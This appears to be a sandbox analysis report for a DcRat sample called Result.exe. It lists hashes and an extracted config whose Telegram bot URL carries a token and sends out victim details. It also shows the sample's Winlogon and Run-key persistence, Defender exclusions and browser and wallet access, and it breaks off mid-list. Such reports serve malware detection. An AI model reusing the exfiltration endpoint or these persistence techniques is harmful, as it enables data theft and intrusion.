Analysis
-
max time kernel
153s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11-07-2024 19:17
Behavioral task
behavioral1
Sample
Result.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Result.exe
Resource
win10v2004-20240709-en
General
-
Target
Result.exe
-
Size
2.6MB
-
MD5
170b43350048ed4b6fca0e50a0178621
-
SHA1
db863b7b04a7c58baa9120e2f184517ed27a7252
-
SHA256
248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b
-
SHA512
e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7
-
SSDEEP
49152:QBojA1ji5xFbA3j2B0tDrgop9U+t3DqScnLeMgs9Q:QU57bVB0tDrg+USDPcLeQQ
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20946cf98fc71fd1f8dce806e356c572f84f7e0ade%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20YPIMFIYL%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CDefault%20User%5Csppsvc.ex
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 15 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\", \"C:\\Windows\\Vss\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\TextInputHost.exe\", \"C:\\Windows\\LiveKernelReports\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\", \"C:\\Windows\\Vss\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\", \"C:\\Windows\\Vss\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\TextInputHost.exe\", \"C:\\Windows\\LiveKernelReports\\Refcrt.exe\", \"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate_bk\\Offline\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Common Files\\Services\\dllhost.exe\", \"C:\\Users\\Default User\\sppsvc.exe\", \"C:\\Program Files\\Common Files\\System\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Users\\Default\\Local Settings\\lsass.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\", \"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\", \"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\", \"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\", \"C:\\Windows\\Vss\\RuntimeBroker.exe\"" Refcrt.exe -
Process spawned unexpected child process 45 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3304 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4312 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2848 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4316 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3984 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 440 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4764 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2280 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 596 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3512 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3096 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4092 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2408 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 948 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1020 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1544 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1328 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2832 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4696 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 208 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1580 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1548 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1948 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4088 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2436 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1376 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 512 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4816 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3608 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3364 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1880 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 796 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4760 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1184 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3356 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 3128 schtasks.exe 93 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1420 3128 schtasks.exe 93 -
resource yara_rule behavioral2/files/0x00080000000234c2-14.dat dcrat behavioral2/memory/1576-17-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral2/files/0x00070000000234c4-33.dat dcrat behavioral2/memory/4956-35-0x0000000000730000-0x00000000008B4000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3832 powershell.exe 4340 powershell.exe 4708 powershell.exe 3424 powershell.exe 3656 powershell.exe 100 powershell.exe 4372 powershell.exe 540 powershell.exe 4508 powershell.exe 4344 powershell.exe 4324 powershell.exe 3224 powershell.exe 3256 powershell.exe 3088 powershell.exe 1456 powershell.exe 2860 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation sppsvc.exe Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation Result.exe Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation solara.exe Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation Refcrt.exe Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation SolaraBootstrapper.exe -
Executes dropped EXE 7 IoCs
pid Process 1168 SolaraBootstrapper.exe 4528 solara.exe 4956 Refcrt.exe 3048 sppsvc.exe 3192 vc_redist.x64.exe 1544 vc_redist.x64.exe 14080 sppsvc.exe -
Loads dropped DLL 12 IoCs
pid Process 5708 MsiExec.exe 5708 MsiExec.exe 5784 MsiExec.exe 5784 MsiExec.exe 5784 MsiExec.exe 5784 MsiExec.exe 5784 MsiExec.exe 4892 MsiExec.exe 4892 MsiExec.exe 4892 MsiExec.exe 5708 MsiExec.exe 1544 vc_redist.x64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 30 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Security\\BrowserCore\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\LiveKernelReports\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Windows\\LiveKernelReports\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate_bk\\Offline\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Default\\Local Settings\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Windows Media Player\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Vss\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Default\\Local Settings\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Refcrt = "\"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate_bk\\Offline\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default User\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\System\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Admin\\Pictures\\Camera Roll\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Program Files\\Windows Security\\BrowserCore\\TextInputHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Common Files\\Services\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Common Files\\Services\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Common Files\\System\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default User\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\Vss\\RuntimeBroker.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\SppExtComObj.exe\"" Refcrt.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 22 2796 msiexec.exe 24 2796 msiexec.exe 26 2796 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com 32 ipinfo.io 33 ipinfo.io 116 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\node_modules\glob\glob.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\dist\diff.min.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\neq.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-adduser.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\clone\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\opts.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\restart.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\gyp msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\ours\util.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\lib\errors.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-bundled\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\readdir-scoped.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-dedupe.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\inherits\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\removal.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\helpers.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\signal-handling.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\google\protobuf\descriptor.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\CONTRIBUTING.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\proc-log\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\smart-buffer\build\utils.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\LICENSE.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\src\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\utils\types.js msiexec.exe File created 